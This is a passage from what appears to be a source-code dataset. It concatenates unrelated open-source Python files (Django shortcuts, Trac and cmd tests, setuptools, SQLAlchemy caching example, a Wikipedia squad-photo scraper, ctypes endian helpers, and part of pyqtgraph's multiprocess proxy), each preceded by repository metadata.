def _get_queryset(klass):
"""
Returns a QuerySet from a Model, Manager, or QuerySet. Created to make
get_object_or_404 and get_list_or_404 more DRY.
"""
if isinstance(klass, QuerySet):
return klass
elif isinstance(klass, Manager):
manager = klass
else:
manager = klass._default_manager
return manager.all()
def get_object_or_404(klass, *args, **kwargs):
"""
Uses get() to return an object, or raises a Http404 exception if the object
does not exist.
klass may be a Model, Manager, or QuerySet object. All other passed
arguments and keyword arguments are used in the get() query.
Note: Like with get(), a MultipleObjectsReturned will be raised if more than one
object is found.
"""
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist:
raise Http404('No %s matches the given query.' % queryset.model._meta.object_name)
def get_list_or_404(klass, *args, **kwargs):
"""
Uses filter() to return a list of objects, or raise a Http404 exception if
the list is empty.
klass may be a Model, Manager, or QuerySet object. All other passed
arguments and keyword arguments are used in the filter() query.
"""
queryset = _get_queryset(klass)
obj_list = list(queryset.filter(*args, **kwargs))
if not obj_list:
raise Http404('No %s matches the given query.' % queryset.model._meta.object_name)
return obj_list
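# --- hedged usage sketch (editor addition) --------------------------------
# `Article` is a placeholder model; any Model, Manager or QuerySet works.
#
#   article = get_object_or_404(Article, pk=1)                 # Http404 if missing
#   drafts = get_list_or_404(Article.objects, status='draft')  # Http404 if empty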
|
dinhkhanh/trac
|
refs/heads/master
|
trac/tests/resource.py
|
6
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import doctest
import unittest
from trac import resource
class ResourceTestCase(unittest.TestCase):
def test_equals(self):
# Plain equalities
self.assertEqual(resource.Resource(), resource.Resource())
self.assertEqual(resource.Resource(None), resource.Resource())
self.assertEqual(resource.Resource('wiki'), resource.Resource('wiki'))
self.assertEqual(resource.Resource('wiki', 'WikiStart'),
resource.Resource('wiki', 'WikiStart'))
self.assertEqual(resource.Resource('wiki', 'WikiStart', 42),
resource.Resource('wiki', 'WikiStart', 42))
# Inequalities
self.assertNotEqual(resource.Resource('wiki', 'WikiStart', 42),
resource.Resource('wiki', 'WikiStart', 43))
self.assertNotEqual(resource.Resource('wiki', 'WikiStart', 0),
resource.Resource('wiki', 'WikiStart', None))
# Resource hierarchy
r1 = resource.Resource('attachment', 'file.txt')
r1.parent = resource.Resource('wiki', 'WikiStart')
r2 = resource.Resource('attachment', 'file.txt')
r2.parent = resource.Resource('wiki', 'WikiStart')
self.assertEqual(r1, r2)
r2.parent = r2.parent(version=42)
self.assertNotEqual(r1, r2)
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(resource))
suite.addTest(unittest.makeSuite(ResourceTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
sw-irou/flasktest
|
refs/heads/master
|
lib/setuptools/command/install_lib.py
|
454
|
from distutils.command.install_lib import install_lib as _install_lib
import os
class install_lib(_install_lib):
"""Don't add compiled flags to filenames of non-Python files"""
def _bytecode_filenames (self, py_filenames):
bytecode_files = []
for py_file in py_filenames:
if not py_file.endswith('.py'):
continue
if self.compile:
bytecode_files.append(py_file + "c")
if self.optimize > 0:
bytecode_files.append(py_file + "o")
return bytecode_files
def run(self):
self.build()
outfiles = self.install()
if outfiles is not None:
# always compile, in case we have any extension stubs to deal with
self.byte_compile(outfiles)
def get_exclusions(self):
exclude = {}
nsp = self.distribution.namespace_packages
if (nsp and self.get_finalized_command('install')
.single_version_externally_managed
):
for pkg in nsp:
parts = pkg.split('.')
while parts:
pkgdir = os.path.join(self.install_dir, *parts)
for f in '__init__.py', '__init__.pyc', '__init__.pyo':
exclude[os.path.join(pkgdir,f)] = 1
parts.pop()
return exclude
def copy_tree(
self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
):
assert preserve_mode and preserve_times and not preserve_symlinks
exclude = self.get_exclusions()
if not exclude:
return _install_lib.copy_tree(self, infile, outfile)
# Exclude namespace package __init__.py* files from the output
from setuptools.archive_util import unpack_directory
from distutils import log
outfiles = []
def pf(src, dst):
if dst in exclude:
log.warn("Skipping installation of %s (namespace package)",dst)
return False
log.info("copying %s -> %s", src, os.path.dirname(dst))
outfiles.append(dst)
return dst
unpack_directory(infile, outfile, pf)
return outfiles
def get_outputs(self):
outputs = _install_lib.get_outputs(self)
exclude = self.get_exclusions()
if exclude:
return [f for f in outputs if f not in exclude]
return outputs
|
cloudera/hue
|
refs/heads/master
|
desktop/core/ext-py/SQLAlchemy-1.3.17/examples/dogpile_caching/advanced.py
|
4
|
"""Illustrate usage of Query combined with the FromCache option,
including front-end loading, cache invalidation and collection caching.
"""
from .caching_query import FromCache
from .caching_query import RelationshipCache
from .environment import Session
from .model import cache_address_bits
from .model import Person
def load_name_range(start, end, invalidate=False):
"""Load Person objects on a range of names.
start/end are integers, range is then
"person <start>" - "person <end>".
The cache option we set up is called "name_range", indicating
a range of names for the Person class.
The `Person.addresses` collections are also cached. It's basically
another level of tuning here, as that particular cache option
can be transparently replaced with joinedload(Person.addresses).
The effect is that each Person and their Address collection
is cached either together or separately, affecting the kind of
SQL that emits for unloaded Person objects as well as the distribution
of data within the cache.
"""
q = (
Session.query(Person)
.filter(
Person.name.between("person %.2d" % start, "person %.2d" % end)
)
.options(cache_address_bits)
.options(FromCache("default", "name_range"))
)
# have the "addresses" collection cached separately
# each lazyload of Person.addresses loads from cache.
q = q.options(RelationshipCache(Person.addresses, "default"))
# alternatively, eagerly load the "addresses" collection, so that they'd
# be cached together. This issues a bigger SQL statement and caches
# a single, larger value in the cache per person rather than two
# separate ones.
# q = q.options(joinedload(Person.addresses))
# if requested, invalidate the cache on current criterion.
if invalidate:
q.invalidate()
return q.all()
print("two through twelve, possibly from cache:\n")
print(", ".join([p.name for p in load_name_range(2, 12)]))
print("\ntwenty five through forty, possibly from cache:\n")
print(", ".join([p.name for p in load_name_range(25, 40)]))
# loading them again, no SQL is emitted
print("\ntwo through twelve, from the cache:\n")
print(", ".join([p.name for p in load_name_range(2, 12)]))
# but with invalidate, they are
print("\ntwenty five through forty, invalidate first:\n")
print(", ".join([p.name for p in load_name_range(25, 40, True)]))
# illustrate the address loading from either cache/already
# on the Person
print(
"\n\nPeople plus addresses, two through twelve, addresses "
"possibly from cache"
)
for p in load_name_range(2, 12):
print(p.format_full())
# illustrate the address loading from either cache/already
# on the Person
print("\n\nPeople plus addresses, two through twelve, addresses from cache")
for p in load_name_range(2, 12):
print(p.format_full())
print(
"\n\nIf this was the first run of advanced.py, try "
"a second run. Only one SQL statement will be emitted."
)
|
fighterCui/L4ReFiascoOC
|
refs/heads/master
|
l4/pkg/python/contrib/Lib/test/test_cmd.py
|
56
|
#!/usr/bin/env python
"""
Test script for the 'cmd' module
Original by Michael Schneider
"""
import cmd
import sys
class samplecmdclass(cmd.Cmd):
"""
Instantiate the sample class:
>>> mycmd = samplecmdclass()
Test for the function parseline():
>>> mycmd.parseline("")
(None, None, '')
>>> mycmd.parseline("?")
('help', '', 'help ')
>>> mycmd.parseline("?help")
('help', 'help', 'help help')
>>> mycmd.parseline("!")
('shell', '', 'shell ')
>>> mycmd.parseline("!command")
('shell', 'command', 'shell command')
>>> mycmd.parseline("func")
('func', '', 'func')
>>> mycmd.parseline("func arg1")
('func', 'arg1', 'func arg1')
Test for the function onecmd():
>>> mycmd.onecmd("")
>>> mycmd.onecmd("add 4 5")
9
>>> mycmd.onecmd("")
9
>>> mycmd.onecmd("test")
*** Unknown syntax: test
Test for the function emptyline():
>>> mycmd.emptyline()
*** Unknown syntax: test
Test for the function default():
>>> mycmd.default("default")
*** Unknown syntax: default
Test for the function completedefault():
>>> mycmd.completedefault()
This is the completedefault method
>>> mycmd.completenames("a")
['add']
Test for the function completenames():
>>> mycmd.completenames("12")
[]
>>> mycmd.completenames("help")
['help', 'help']
Test for the function complete_help():
>>> mycmd.complete_help("a")
['add']
>>> mycmd.complete_help("he")
['help', 'help']
>>> mycmd.complete_help("12")
[]
Test for the function do_help():
>>> mycmd.do_help("testet")
*** No help on testet
>>> mycmd.do_help("add")
help text for add
>>> mycmd.onecmd("help add")
help text for add
>>> mycmd.do_help("")
<BLANKLINE>
Documented commands (type help <topic>):
========================================
add
<BLANKLINE>
Undocumented commands:
======================
exit help shell
<BLANKLINE>
Test for the function print_topics():
>>> mycmd.print_topics("header", ["command1", "command2"], 2 ,10)
header
======
command1
command2
<BLANKLINE>
Test for the function columnize():
>>> mycmd.columnize([str(i) for i in xrange(20)])
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
>>> mycmd.columnize([str(i) for i in xrange(20)], 10)
0 7 14
1 8 15
2 9 16
3 10 17
4 11 18
5 12 19
6 13
This is an interactive test, put some commands in the cmdqueue attribute
and let it execute
This test includes the preloop(), postloop(), default(), emptyline(),
parseline(), do_help() functions
>>> mycmd.use_rawinput=0
>>> mycmd.cmdqueue=["", "add", "add 4 5", "help", "help add","exit"]
>>> mycmd.cmdloop()
Hello from preloop
help text for add
*** invalid number of arguments
9
<BLANKLINE>
Documented commands (type help <topic>):
========================================
add
<BLANKLINE>
Undocumented commands:
======================
exit help shell
<BLANKLINE>
help text for add
Hello from postloop
"""
def preloop(self):
print "Hello from preloop"
def postloop(self):
print "Hello from postloop"
def completedefault(self, *ignored):
print "This is the completedefault methode"
return
def complete_command(self):
print "complete command"
return
def do_shell(self):
pass
def do_add(self, s):
l = s.split()
if len(l) != 2:
print "*** invalid number of arguments"
return
try:
l = [int(i) for i in l]
except ValueError:
print "*** arguments should be numbers"
return
print l[0]+l[1]
def help_add(self):
print "help text for add"
return
def do_exit(self, arg):
return True
def test_main(verbose=None):
from test import test_support, test_cmd
test_support.run_doctest(test_cmd, verbose)
import trace, sys
def test_coverage(coverdir):
tracer=trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,],
trace=0, count=1)
tracer.run('reload(cmd);test_main()')
r=tracer.results()
print "Writing coverage results..."
r.write_results(show_missing=True, summary=True, coverdir=coverdir)
if __name__ == "__main__":
if "-c" in sys.argv:
test_coverage('/tmp/cmd.cover')
else:
test_main()
|
pedrotari7/euro
|
refs/heads/master
|
players.py
|
1
|
import requests,os
import urllib
from bs4 import BeautifulSoup as BS
main = 'https://en.wikipedia.org'
link = main + '/wiki/UEFA_Euro_2016_squads'
r = requests.get(link)
s = BS(r.text,'lxml')
tables = s.findAll(attrs={"class":"sortable"})
teams_name = [t.text for t in s.findAll(attrs={"class":"mw-headline"}) if 'Group' not in t.text and 'By ' not in t.text and 'References' not in t.text and 'Player' not in t.text]
teams = dict()
for i,team_table in enumerate(tables):
path = os.path.join('images','teams',teams_name[i])
if not os.path.exists(path):
os.mkdir(path)
teams[teams_name[i]] = []
for player in team_table.findAll('th'):
if player.attrs['scope'] == 'row':
new_player = dict()
new_player['link'] = player.a.attrs['href']
new_player['name'] = player.a.text
teams[teams_name[i]].append(new_player)
print new_player['name']
r1 = requests.get(main + new_player['link'])
s1 = BS(r1.text,'lxml')
image = s1.find_all('a',{'class':'image'})
if len(image) > 0:
new_player['image'] = 'http:' + image[0].img['src']
print new_player['image']
urllib.urlretrieve(new_player['image'], os.path.join('images','teams',teams_name[i],new_player['name']+'.jpg'))
#teams[teams_name[i]] = [player for j,player in enumerate(teams[teams_name[i]]) if j%2==0]
|
m11s/MissionPlanner
|
refs/heads/master
|
Lib/ctypes/_endian.py
|
51
|
######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
import sys
from ctypes import *
_array_type = type(c_int * 3)
def _other_endian(typ):
"""Return the type with the 'other' byte order. Simple types like
c_int and so on already have __ctype_be__ and __ctype_le__
attributes which contain the types, for more complicated types
only arrays are supported.
"""
try:
return getattr(typ, _OTHER_ENDIAN)
except AttributeError:
if type(typ) == _array_type:
return _other_endian(typ._type_) * typ._length_
raise TypeError("This type does not support other endian: %s" % typ)
class _swapped_meta(type(Structure)):
def __setattr__(self, attrname, value):
if attrname == "_fields_":
fields = []
for desc in value:
name = desc[0]
typ = desc[1]
rest = desc[2:]
fields.append((name, _other_endian(typ)) + rest)
value = fields
super(_swapped_meta, self).__setattr__(attrname, value)
################################################################
# Note: The Structure metaclass checks for the *presence* (not the
# value!) of a _swapped_bytes_ attribute to determine the bit order in
# structures containing bit fields.
if sys.byteorder == "little":
_OTHER_ENDIAN = "__ctype_be__"
LittleEndianStructure = Structure
class BigEndianStructure(Structure):
"""Structure with big endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
elif sys.byteorder == "big":
_OTHER_ENDIAN = "__ctype_le__"
BigEndianStructure = Structure
class LittleEndianStructure(Structure):
"""Structure with little endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
else:
raise RuntimeError("Invalid byteorder")
|
isaacyeaton/pyadisi
|
refs/heads/develop
|
pyadisi/pyqtgraph/multiprocess/remoteproxy.py
|
4
|
import os, time, sys, traceback, weakref
import numpy as np
try:
import __builtin__ as builtins
import cPickle as pickle
except ImportError:
import builtins
import pickle
# color printing for debugging
from ..util import cprint
class ClosedError(Exception):
"""Raised when an event handler receives a request to close the connection
or discovers that the connection has been closed."""
pass
class NoResultError(Exception):
"""Raised when a request for the return value of a remote call fails
because the call has not yet returned."""
pass
class RemoteEventHandler(object):
"""
This class handles communication between two processes. One instance is present on
each process and listens for communication from the other process. This enables
(amongst other things) ObjectProxy instances to look up their attributes and call
their methods.
This class is responsible for carrying out actions on behalf of the remote process.
Each instance holds one end of a Connection which allows python
objects to be passed between processes.
For the most common operations, see _import(), close(), and transfer()
To handle and respond to incoming requests, RemoteEventHandler requires that its
processRequests method is called repeatedly (this is usually handled by the Process
classes defined in multiprocess.processes).
"""
handlers = {} ## maps {process ID : handler}. This allows unpickler to determine which process
## an object proxy belongs to
def __init__(self, connection, name, pid, debug=False):
self.debug = debug
self.conn = connection
self.name = name
self.results = {} ## reqId: (status, result); cache of request results received from the remote process
## status is either 'result' or 'error'
## if 'error', then result will be (exception, formatted exception)
## where exception may be None if it could not be passed through the Connection.
self.proxies = {} ## maps {weakref(proxy): proxyId}; used to inform the remote process when a proxy has been deleted.
## attributes that affect the behavior of the proxy.
## See ObjectProxy._setProxyOptions for description
self.proxyOptions = {
'callSync': 'sync', ## 'sync', 'async', 'off'
'timeout': 10, ## float
'returnType': 'auto', ## 'proxy', 'value', 'auto'
'autoProxy': False, ## bool
'deferGetattr': False, ## True, False
'noProxyTypes': [ type(None), str, int, float, tuple, list, dict, LocalObjectProxy, ObjectProxy ],
}
self.nextRequestId = 0
self.exited = False
RemoteEventHandler.handlers[pid] = self ## register this handler as the one communicating with pid
@classmethod
def getHandler(cls, pid):
try:
return cls.handlers[pid]
except:
print(pid, cls.handlers)
raise
def debugMsg(self, msg):
if not self.debug:
return
cprint.cout(self.debug, "[%d] %s\n" % (os.getpid(), str(msg)), -1)
def getProxyOption(self, opt):
return self.proxyOptions[opt]
def setProxyOptions(self, **kwds):
"""
Set the default behavior options for object proxies.
See ObjectProxy._setProxyOptions for more info.
"""
self.proxyOptions.update(kwds)
def processRequests(self):
"""Process all pending requests from the pipe, return
after no more events are immediately available. (non-blocking)
Returns the number of events processed.
"""
if self.exited:
self.debugMsg(' processRequests: exited already; raise ClosedError.')
raise ClosedError()
numProcessed = 0
while self.conn.poll():
try:
self.handleRequest()
numProcessed += 1
except ClosedError:
self.debugMsg('processRequests: got ClosedError from handleRequest; setting exited=True.')
self.exited = True
raise
#except IOError as err: ## let handleRequest take care of this.
#self.debugMsg(' got IOError from handleRequest; try again.')
#if err.errno == 4: ## interrupted system call; try again
#continue
#else:
#raise
except:
print("Error in process %s" % self.name)
sys.excepthook(*sys.exc_info())
if numProcessed > 0:
self.debugMsg('processRequests: finished %d requests' % numProcessed)
return numProcessed
def handleRequest(self):
"""Handle a single request from the remote process.
Blocks until a request is available."""
result = None
while True:
try:
## args, kwds are double-pickled to ensure this recv() call never fails
cmd, reqId, nByteMsgs, optStr = self.conn.recv()
break
except EOFError:
self.debugMsg(' handleRequest: got EOFError from recv; raise ClosedError.')
## remote process has shut down; end event loop
raise ClosedError()
except IOError as err:
if err.errno == 4: ## interrupted system call; try again
self.debugMsg(' handleRequest: got IOError 4 from recv; try again.')
continue
else:
self.debugMsg(' handleRequest: got IOError %d from recv (%s); raise ClosedError.' % (err.errno, err.strerror))
raise ClosedError()
self.debugMsg(" handleRequest: received %s %s" % (str(cmd), str(reqId)))
## read byte messages following the main request
byteData = []
if nByteMsgs > 0:
self.debugMsg(" handleRequest: reading %d byte messages" % nByteMsgs)
for i in range(nByteMsgs):
while True:
try:
byteData.append(self.conn.recv_bytes())
break
except EOFError:
self.debugMsg(" handleRequest: got EOF while reading byte messages; raise ClosedError.")
raise ClosedError()
except IOError as err:
if err.errno == 4:
self.debugMsg(" handleRequest: got IOError 4 while reading byte messages; try again.")
continue
else:
self.debugMsg(" handleRequest: got IOError while reading byte messages; raise ClosedError.")
raise ClosedError()
try:
if cmd == 'result' or cmd == 'error':
resultId = reqId
reqId = None ## prevents attempt to return information from this request
## (this is already a return from a previous request)
opts = pickle.loads(optStr)
self.debugMsg(" handleRequest: id=%s opts=%s" % (str(reqId), str(opts)))
#print os.getpid(), "received request:", cmd, reqId, opts
returnType = opts.get('returnType', 'auto')
if cmd == 'result':
self.results[resultId] = ('result', opts['result'])
elif cmd == 'error':
self.results[resultId] = ('error', (opts['exception'], opts['excString']))
elif cmd == 'getObjAttr':
result = getattr(opts['obj'], opts['attr'])
elif cmd == 'callObj':
obj = opts['obj']
fnargs = opts['args']
fnkwds = opts['kwds']
## If arrays were sent as byte messages, they must be re-inserted into the
## arguments
if len(byteData) > 0:
for i,arg in enumerate(fnargs):
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnargs[i] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
for k,arg in fnkwds.items():
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnkwds[k] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
if len(fnkwds) == 0: ## need to do this because some functions do not allow keyword arguments.
try:
result = obj(*fnargs)
except:
print("Failed to call object %s: %d, %s" % (obj, len(fnargs), fnargs[1:]))
raise
else:
result = obj(*fnargs, **fnkwds)
elif cmd == 'getObjValue':
result = opts['obj'] ## has already been unpickled into its local value
returnType = 'value'
elif cmd == 'transfer':
result = opts['obj']
returnType = 'proxy'
elif cmd == 'transferArray':
## read array data from next message:
result = np.fromstring(byteData[0], dtype=opts['dtype']).reshape(opts['shape'])
returnType = 'proxy'
elif cmd == 'import':
name = opts['module']
fromlist = opts.get('fromlist', [])
mod = builtins.__import__(name, fromlist=fromlist)
if len(fromlist) == 0:
parts = name.lstrip('.').split('.')
result = mod
for part in parts[1:]:
result = getattr(result, part)
else:
result = map(mod.__getattr__, fromlist)
elif cmd == 'del':
LocalObjectProxy.releaseProxyId(opts['proxyId'])
#del self.proxiedObjects[opts['objId']]
elif cmd == 'close':
if reqId is not None:
result = True
returnType = 'value'
exc = None
except:
exc = sys.exc_info()
if reqId is not None:
if exc is None:
self.debugMsg(" handleRequest: sending return value for %d: %s" % (reqId, str(result)))
#print "returnValue:", returnValue, result
if returnType == 'auto':
result = self.autoProxy(result, self.proxyOptions['noProxyTypes'])
elif returnType == 'proxy':
result = LocalObjectProxy(result)
try:
self.replyResult(reqId, result)
except:
sys.excepthook(*sys.exc_info())
self.replyError(reqId, *sys.exc_info())
else:
self.debugMsg(" handleRequest: returning exception for %d" % reqId)
self.replyError(reqId, *exc)
elif exc is not None:
sys.excepthook(*exc)
if cmd == 'close':
if opts.get('noCleanup', False) is True:
os._exit(0) ## exit immediately, do not pass GO, do not collect $200.
## (more importantly, do not call any code that would
## normally be invoked at exit)
else:
raise ClosedError()
def replyResult(self, reqId, result):
self.send(request='result', reqId=reqId, callSync='off', opts=dict(result=result))
def replyError(self, reqId, *exc):
print("error: %s %s %s" % (self.name, str(reqId), str(exc[1])))
excStr = traceback.format_exception(*exc)
try:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=exc[1], excString=excStr))
except:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=None, excString=excStr))
def send(self, request, opts=None, reqId=None, callSync='sync', timeout=10, returnType=None, byteData=None, **kwds):
"""Send a request or return packet to the remote process.
Generally it is not necessary to call this method directly; it is for internal use.
(The docstring has information that is nevertheless useful to the programmer
as it describes the internal protocol used to communicate between processes)
============== ====================================================================
**Arguments:**
request String describing the type of request being sent (see below)
reqId Integer uniquely linking a result back to the request that generated
it. (most requests leave this blank)
callSync 'sync': return the actual result of the request
'async': return a Request object which can be used to look up the
result later
'off': return no result
timeout Time in seconds to wait for a response when callSync=='sync'
opts Extra arguments sent to the remote process that determine the way
the request will be handled (see below)
returnType 'proxy', 'value', or 'auto'
byteData If specified, this is a list of objects to be sent as byte messages
to the remote process.
This is used to send large arrays without the cost of pickling.
============== ====================================================================
Description of request strings and options allowed for each:
============= ============= ========================================================
request option description
------------- ------------- --------------------------------------------------------
getObjAttr Request the remote process return (proxy to) an
attribute of an object.
obj reference to object whose attribute should be
returned
attr string name of attribute to return
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
callObj Request the remote process call a function or
method. If a request ID is given, then the call's
return value will be sent back (or information
about the error that occurred while running the
function)
obj the (reference to) object to call
args tuple of arguments to pass to callable
kwds dict of keyword arguments to pass to callable
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
getObjValue Request the remote process return the value of
a proxied object (must be picklable)
obj reference to object whose value should be returned
transfer Copy an object to the remote process and request
it return a proxy for the new object.
obj The object to transfer.
import Request the remote process import new symbols
and return proxy(ies) to the imported objects
module the string name of the module to import
fromlist optional list of string names to import from module
del Inform the remote process that a proxy has been
released (thus the remote process may be able to
release the original object)
proxyId id of proxy which is no longer referenced by
remote host
close Instruct the remote process to stop its event loop
and exit. Optionally, this request may return a
confirmation.
result Inform the remote process that its request has
been processed
result return value of a request
error Inform the remote process that its request failed
exception the Exception that was raised (or None if the
exception could not be pickled)
excString string-formatted version of the exception and
traceback
============= ============= ========================================================
"""
#if len(kwds) > 0:
#print "Warning: send() ignored args:", kwds
if opts is None:
opts = {}
assert callSync in ['off', 'sync', 'async'], 'callSync must be one of "off", "sync", or "async"'
if reqId is None:
if callSync != 'off': ## requested return value; use the next available request ID
reqId = self.nextRequestId
self.nextRequestId += 1
else:
## If requestId is provided, this _must_ be a response to a previously received request.
assert request in ['result', 'error']
if returnType is not None:
opts['returnType'] = returnType
#print os.getpid(), "send request:", request, reqId, opts
## double-pickle args to ensure that at least status and request ID get through
try:
optStr = pickle.dumps(opts)
except:
print("==== Error pickling this object: ====")
print(opts)
print("=======================================")
raise
nByteMsgs = 0
if byteData is not None:
nByteMsgs = len(byteData)
## Send primary request
request = (request, reqId, nByteMsgs, optStr)
self.debugMsg('send request: cmd=%s nByteMsgs=%d id=%s opts=%s' % (str(request[0]), nByteMsgs, str(reqId), str(opts)))
self.conn.send(request)
## follow up by sending byte messages
if byteData is not None:
for obj in byteData: ## Remote process _must_ be prepared to read the same number of byte messages!
self.conn.send_bytes(obj)
self.debugMsg(' sent %d byte messages' % len(byteData))
self.debugMsg(' call sync: %s' % callSync)
if callSync == 'off':
return
req = Request(self, reqId, description=str(request), timeout=timeout)
if callSync == 'async':
return req
if callSync == 'sync':
try:
return req.result()
except NoResultError:
return req
def close(self, callSync='off', noCleanup=False, **kwds):
self.send(request='close', opts=dict(noCleanup=noCleanup), callSync=callSync, **kwds)
def getResult(self, reqId):
## raises NoResultError if the result is not available yet
#print self.results.keys(), os.getpid()
if reqId not in self.results:
try:
self.processRequests()
except ClosedError: ## even if remote connection has closed, we may have
## received new data during this call to processRequests()
pass
if reqId not in self.results:
raise NoResultError()
status, result = self.results.pop(reqId)
if status == 'result':
return result
elif status == 'error':
#print ''.join(result)
exc, excStr = result
if exc is not None:
print("===== Remote process raised exception on request: =====")
print(''.join(excStr))
print("===== Local Traceback to request follows: =====")
raise exc
else:
print(''.join(excStr))
raise Exception("Error getting result. See above for exception from remote process.")
else:
raise Exception("Internal error.")
def _import(self, mod, **kwds):
"""
Request the remote process import a module (or symbols from a module)
and return the proxied results. Uses built-in __import__() function, but
adds a bit more processing:
_import('module') => returns module
_import('module.submodule') => returns submodule
(note this differs from behavior of __import__)
_import('module', fromlist=[name1, name2, ...]) => returns [module.name1, module.name2, ...]
(this also differs from behavior of __import__)
"""
return self.send(request='import', callSync='sync', opts=dict(module=mod), **kwds)
def getObjAttr(self, obj, attr, **kwds):
return self.send(request='getObjAttr', opts=dict(obj=obj, attr=attr), **kwds)
def getObjValue(self, obj, **kwds):
return self.send(request='getObjValue', opts=dict(obj=obj), **kwds)
def callObj(self, obj, args, kwds, **opts):
opts = opts.copy()
args = list(args)
## Decide whether to send arguments by value or by proxy
noProxyTypes = opts.pop('noProxyTypes', None)
if noProxyTypes is None:
noProxyTypes = self.proxyOptions['noProxyTypes']
autoProxy = opts.pop('autoProxy', self.proxyOptions['autoProxy'])
if autoProxy is True:
args = [self.autoProxy(v, noProxyTypes) for v in args]
for k, v in kwds.items():
opts[k] = self.autoProxy(v, noProxyTypes)
byteMsgs = []
## If there are arrays in the arguments, send those as byte messages.
## We do this because pickling arrays is too expensive.
for i,arg in enumerate(args):
if arg.__class__ == np.ndarray:
args[i] = ("__byte_message__", len(byteMsgs), (arg.dtype, arg.shape))
byteMsgs.append(arg)
for k,v in kwds.items():
if v.__class__ == np.ndarray:
kwds[k] = ("__byte_message__", len(byteMsgs), (v.dtype, v.shape))
byteMsgs.append(v)
return self.send(request='callObj', opts=dict(obj=obj, args=args, kwds=kwds), byteData=byteMsgs, **opts)
def registerProxy(self, proxy):
ref = weakref.ref(proxy, self.deleteProxy)
self.proxies[ref] = proxy._proxyId
def deleteProxy(self, ref):
proxyId = self.proxies.pop(ref)
try:
self.send(request='del', opts=dict(proxyId=proxyId), callSync='off')
except IOError: ## if remote process has closed down, there is no need to send delete requests anymore
pass
def transfer(self, obj, **kwds):
"""
Transfer an object by value to the remote host (the object must be picklable)
and return a proxy for the new remote object.
"""
if obj.__class__ is np.ndarray:
opts = {'dtype': obj.dtype, 'shape': obj.shape}
return self.send(request='transferArray', opts=opts, byteData=[obj], **kwds)
else:
return self.send(request='transfer', opts=dict(obj=obj), **kwds)
def autoProxy(self, obj, noProxyTypes):
## Return object wrapped in LocalObjectProxy _unless_ its type is in noProxyTypes.
for typ in noProxyTypes:
if isinstance(obj, typ):
return obj
return LocalObjectProxy(obj)
class Request(object):
"""
Request objects are returned when calling an ObjectProxy in asynchronous mode
or if a synchronous call has timed out. Use hasResult() to ask whether
the result of the call has been returned yet. Use result() to get
the returned value.
"""
def __init__(self, process, reqId, description=None, timeout=10):
self.proc = process
self.description = description
self.reqId = reqId
self.gotResult = False
self._result = None
self.timeout = timeout
def result(self, block=True, timeout=None):
"""
Return the result for this request.
If block is True, wait until the result has arrived or *timeout* seconds passes.
If the timeout is reached, raise NoResultError. (use timeout=None to disable)
If block is False, raise NoResultError immediately if the result has not arrived yet.
If the process's connection has closed before the result arrives, raise ClosedError.
"""
if self.gotResult:
return self._result
if timeout is None:
timeout = self.timeout
if block:
start = time.time()
while not self.hasResult():
if self.proc.exited:
raise ClosedError()
time.sleep(0.005)
if timeout >= 0 and time.time() - start > timeout:
print("Request timed out: %s" % self.description)
import traceback
traceback.print_stack()
raise NoResultError()
return self._result
else:
self._result = self.proc.getResult(self.reqId) ## raises NoResultError if result is not available yet
self.gotResult = True
return self._result
def hasResult(self):
"""Returns True if the result for this request has arrived."""
try:
self.result(block=False)
except NoResultError:
pass
return self.gotResult
class LocalObjectProxy(object):
"""
    Used for wrapping local objects to ensure that they are sent by proxy to a remote host.
Note that 'proxy' is just a shorter alias for LocalObjectProxy.
For example::
data = [1,2,3,4,5]
remotePlot.plot(data) ## by default, lists are pickled and sent by value
remotePlot.plot(proxy(data)) ## force the object to be sent by proxy
"""
nextProxyId = 0
proxiedObjects = {} ## maps {proxyId: object}
@classmethod
def registerObject(cls, obj):
## assign it a unique ID so we can keep a reference to the local object
pid = cls.nextProxyId
cls.nextProxyId += 1
cls.proxiedObjects[pid] = obj
#print "register:", cls.proxiedObjects
return pid
@classmethod
def lookupProxyId(cls, pid):
return cls.proxiedObjects[pid]
@classmethod
def releaseProxyId(cls, pid):
del cls.proxiedObjects[pid]
#print "release:", cls.proxiedObjects
def __init__(self, obj, **opts):
"""
Create a 'local' proxy object that, when sent to a remote host,
        will appear as a normal ObjectProxy referring to *obj*.
Any extra keyword arguments are passed to proxy._setProxyOptions()
on the remote side.
"""
self.processId = os.getpid()
#self.objectId = id(obj)
self.typeStr = repr(obj)
#self.handler = handler
self.obj = obj
self.opts = opts
def __reduce__(self):
## a proxy is being pickled and sent to a remote process.
## every time this happens, a new proxy will be generated in the remote process,
        ## so we register a new ID so we can track when each is released.
pid = LocalObjectProxy.registerObject(self.obj)
return (unpickleObjectProxy, (self.processId, pid, self.typeStr, None, self.opts))
## alias
proxy = LocalObjectProxy
def unpickleObjectProxy(processId, proxyId, typeStr, attributes=None, opts=None):
if processId == os.getpid():
obj = LocalObjectProxy.lookupProxyId(proxyId)
if attributes is not None:
for attr in attributes:
obj = getattr(obj, attr)
return obj
else:
proxy = ObjectProxy(processId, proxyId=proxyId, typeStr=typeStr)
if opts is not None:
